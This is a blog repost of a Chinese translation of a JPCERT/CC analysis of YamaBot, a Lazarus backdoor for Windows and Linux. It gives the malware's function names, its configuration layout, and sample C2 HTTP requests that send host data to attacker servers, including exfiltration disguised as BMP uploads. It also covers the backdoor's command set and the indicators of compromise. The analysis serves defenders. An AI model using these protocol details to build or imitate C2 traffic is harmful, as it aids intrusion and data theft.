close
關鍵詞

APT、惡意軟件、漏洞、安全技術

1.
YamaBot概述


近年來JPCERT/CC 正在不斷調查攻擊組織Lazarus的活動。在2021年度的CODE BLUE和HITCON上,JPCERT/CC的朝長秀誠發布了Lazarus的攻擊活動分析報告,並確認了其中針對 Linux 操作系統的惡意軟件 YamaBot。

YamaBot 是使用 Go 語言創建的、使用 HTTP 請求與 C2 服務器通信的惡意軟件,在不同平台創建的惡意軟件的功能略有不同。下面是針對 Windows 操作系統的樣本中包含的惡意軟件的函數名稱列表(YamaBot 是攻擊者自己命名的惡意軟件)。

_/D_/Bot/YamaBot/utilities.BaseDecodeR

_/D_/Bot/YamaBot/utilities.HttpPostWithCookie

_/D_/Bot/YamaBot/utilities.HttpPostWithFile

_/D_/Bot/YamaBot/utilities.GetMacAddress

_/D_/Bot/YamaBot/utilities.GetHash

_/D_/Bot/YamaBot/utilities.GetCookieParams

_/D_/Bot/YamaBot/utilities.GetRndString

_/D_/Bot/YamaBot/utilities.BmpMaker

_/D_/Bot/YamaBot/utilities.createMutex

_/D_/Bot/YamaBot/utilities.CCheckkmutex

_/D_/Bot/YamaBot/utilities.CIpaddress

_/D_/Bot/YamaBot/utilities.COsname

_/D_/Bot/YamaBot/utilities.getOSVer

_/D_/Bot/YamaBot/utilities.Run

_/D_/Bot/YamaBot/utilities.Run.func1

_/D_/Bot/YamaBot/utilities.Run.func2

_/D_/Bot/YamaBot/engine.(*FileStruct).Lunch

_/D_/Bot/YamaBot/engine.(*FileStruct).Init_Verbindung

_/D_/Bot/YamaBot/engine.(*FileStruct).Verschlusselte_Zeichenkette_Eerhalten

_/D_/Bot/YamaBot/engine.(*FileStruct).getInitBotInfo

_/D_/Bot/YamaBot/engine.(*FileStruct).getEggPrice

_/D_/Bot/YamaBot/engine.(*FileStruct).handleMarketPrice

_/D_/Bot/YamaBot/engine.(*FileStruct).processMarketPrice

_/D_/Bot/YamaBot/engine.(*FileStruct).getSessionStr

下面是針對 Linux 操作系統的樣本中包含的惡意軟件的函數名稱列表,此處使用了一個叫Kaos的名字。
_/C_/Users/administrator/Downloads/kaos/utilities.BaseDecodeR
_/C_/Users/administrator/Downloads/kaos/utilities.HttpPostWithCookie
_/C_/Users/administrator/Downloads/kaos/utilities.BaseDecode
_/C_/Users/administrator/Downloads/kaos/utilities.HttpPostWithFile
_/C_/Users/administrator/Downloads/kaos/utilities.GenerateUniqueID
_/C_/Users/administrator/Downloads/kaos/utilities.GetCookieParams
_/C_/Users/administrator/Downloads/kaos/utilities.BaseEncode
_/C_/Users/administrator/Downloads/kaos/utilities.GetRndString
_/C_/Users/administrator/Downloads/kaos/utilities.EierKochen
_/C_/Users/administrator/Downloads/kaos/utilities.CIpaddress
_/C_/Users/administrator/Downloads/kaos/utilities.Run
_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).Lunch
_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).kandidatKaufhaus
_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).initDuck
_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).GetEncString
_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).getInitEggPrice
_/C_/Users/administrator/Downloads/kaos/utilities.COsname
_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).getEggPrice
_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).handleMarketPrice
_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).processMarketPrice
_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).getSessionStr
_/C_/Users/administrator/Downloads/kaos/engine.NewEgg

惡意軟件配置信息包括 RC4 密鑰等(詳細配置信息的詳細信息見表1、表2)。配置信息與操作系統沒有區別。

表1 配置信息列表 (x86)

偏移描述備註0x000間隔通信間隔0x004-未使用0x008C2服務器-0x00CC2服務器長度-0x010RC4密鑰-0x014RC4密鑰長度-0x018連接C2服務器是否成功連接到C2服務器0x01CCookie標頭值要在Cookie標頭中設置的值0x020-未使用0x024連接次數與C2服務器的重新連接次數表2配置信息列表 (x64)偏移描述備註0x000間隔通信間隔0x008C2服務器-0x010C2服務器長度-0x018RC4密鑰-0x020RC4密鑰長度-0x028連接C2服務器是否成功連接到C2服務器0x030Cookie標頭值要在Cookie標頭中設置的值0x038-未使用0x040連接次數與C2服務器的重新連接次數
2.
通信方式


YamaBot 使用 HTTP 請求與 C2 服務器通信。YamaBot發送的第一個 HTTP 開機自檢請求如下。這是一個 HTTP 開機自檢請求,但沒有要發送的數據,其用戶代理是 Base64 編碼的。

POST /editor/session/aaa000/support.php HTTP/1.1

Host: 213.180.180.154

User-Agent: TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzYwLjAuMzExMi4xMTMgU2FmYXJpLzUzNy4zNg==

Connection: close

Content-Length: 0

Accept-Encoding: gzip

如果成功連接到 C2 服務器,則YamaBot 在 Cookie 標頭中添加一些信息並發送。添加的信息包括隨機生成的4 字節字符串和 16 字節RC4 密鑰的Base64 編碼。RC4密鑰使用從以下數據生成的 MD5 值的前 16 個字節。

captcha_session中的內容:

目標 Windows 操作系統:主機名、用戶名、MAC 地址

目標 Linux 操作系統:主機名、用戶名

captcha_val中的內容:RC4 加密和 Base64 編碼的終端信息和命令執行結果

POST /editor/session/aaa000/support.php HTTP/1.1

Host: 213.180.180.154

User-Agent: TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzYwLjAuMzExMi4xMTMgU2FmYXJpLzUzNy4zNg==

Connection: close

Content-Length: 0

Cookie: captcha_session=MTE5NzZmMTYwYzRlNTU4YjhhNDZhMTM4ZGMwNzgzNTNhNmUy; captcha_val=W%2BIePQNeokInrSpb%2Fw1rTLAZvJAZQHmqAm2rXWdTsCvZ

Accept-Encoding: gzip

發送的第一個數據是操作系統信息和 IP 地址:

windows 6 amd64|[192.168.1.1]

linux 386|[192.168.1.1]

此外,如果發送的數據大小超過特定大小(確認3333字節,7000字節的示例),則將發送的數據模擬為多部分 BMP 數據。

POST /recaptcha.php HTTP/1.1

Host: www.karin-store.com

User-Agent: TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzYwLjAuMzExMi4xMTMgU2FmYXJpLzUzNy4zNg==

Connection: close

Content-Length: [Length]

Content-Type: multipart/form-data; boundary=f24fad327291ab32166b7aa751d1d945a35933ee5bd81618274cda6afeeb

Cookie: captcha_session=YTY5NDQ5MDYwNmRkNjIyOWI3MzU1NTNmYzMxMzhiNTAyNGJh; captcha_val=NGI5NjdhNTdhNjliZTVkMg%3D%3D

Accept-Encoding: gzip

--f24fad327291ab32166b7aa751d1d945a35933ee5bd81618274cda6afeeb

Content-Disposition: form-data; name="recaptcha"; filename="recaptcha.png"

Content-Type: application/octet-stream

BMf6(....0a..DT043b01c728892b495b99ea4c257fe3a8fea3a5f

--f24fad327291ab32166b7aa751d1d945a35933ee5bd81618274cda6afeeb--

來自服務器的指令包含在set- Cookie 的標頭中。指令包含在 RC4 加密(RC4 密鑰使用惡意軟件發送的數據)和 Base64 編碼中,如下所示:

Set-Cookie: captcha_session=[Base64エンコードされた命令]

3. 命令


來自 C2 服務器的指令執行的命令因目標操作系統而異。Linux 操作系統的唯一目標是在 /bin/sh 上運行 shell 命令。另一方面,針對 Windows 操作系統的實現具有多個命令,如下所示:

dir: 獲取文件列表

Mapfs: 獲取目錄列表

Download: 文件下載

Info: 文件路徑,發送 PID

Sleep:休眠時間更改

Uninstall: 刪除主機

i: 間隔時間更改

其他:使用 shell 命令執行給定的字符串

格式要求上述命令包含在前半部分,可表示為:[命令][指令參數]

如果執行該命令,則發送命令執行結果,其中包含部分德語字符,目前尚不清楚在YamaBot中包含德語的原因。

圖1執行i命令時要發送的數據

4. 總結


YamaBot 是攻擊者仍在使用的惡意軟件。由於該惡意軟件不僅針對 Windows 操作系統,還針對 Linux 操作系統,因此在調查事件時,應仔細調查服務器。日本國內當前也確認了多個Lazarus組織的攻擊活動,今後應予以注意。

5.攻擊指標


通信地址:

http://[www].karin-store.com/recaptcha.php

http://[yo]shinorihirano.net/wp-includes/feed-xml.php

http://[213].180.180.154/editor/session/aaa000/support.php

惡意軟件哈希值:

f226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb

6db57bbc2d07343dd6ceba0f53c73756af78f09fe1cb5ce8e8008e5e7242eae1



END

參考鏈接:https://blogs.jpcert.or.jp/ja/2022/06/yamabot.html


編輯|孫書樵

審校|何雙澤、金矢

本文為CNTIC編譯整理,不代表本公眾號觀點,轉載請保留出處與鏈接。聯繫信息進入公眾號後點擊「關於我們」可見。

arrow
arrow
    全站熱搜
    創作者介紹
    創作者 鑽石舞台 的頭像
    鑽石舞台

    鑽石舞台

    鑽石舞台 發表在 痞客邦 留言(0) 人氣()